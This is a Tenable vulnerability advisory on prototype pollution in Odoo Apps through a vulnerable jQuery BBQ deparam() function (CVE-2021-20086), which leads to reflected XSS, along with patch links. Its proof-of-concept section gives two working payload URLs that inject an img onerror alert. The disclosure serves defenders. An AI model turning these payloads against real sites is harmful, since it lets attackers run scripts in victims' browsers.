Synopsis
A researcher at Tenable discovered a prototype pollution vulnerability in Odoo Apps which can result in reflected cross-site scripting (XSS) in affected applications. The vulnerability exists because Odoo leverages a vulnerable version of JQuery Big Back Button (JQuery BBQ), affected by CVE-2021-20086, which can lead to prototype pollution through the deparam() function. An attacker who convinces a victim to visit a specially crafted link could achieve arbitrary javascript execution in the context of the user's browser.
Proof of concept:
In a page which uses the affected deparam() function on unsanitized user input, a reflected XSS payload can be triggered. For example: consider a page which parses the url params like so:
query = $.deparam(window.location.search.slice(1));
The two following urls would trigger a refleced XSS alert box containing the odoo-app domain name:
# PoC fixed in the initial patch https://[odoo-app]/affected_page?__proto__%5Bcontext%5D=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&__proto__%5Bjquery%5D=x # Workaround fixed in final patch https://[odoo-app]/affected_page?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&constructor%5Bprototype%5D%5Bjquery%5D=x
Solution
Odoo has patched this issue in the following commit https://github.com/odoo/odoo/commit/4811b8427cc27607f4b196ea40876bf822452d0dAdditional References
https://nvd.nist.gov/vuln/detail/CVE-2021-20086https://github.com/odoo/odoo/commit/4811b8427cc27607f4b196ea40876bf822452d0d
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team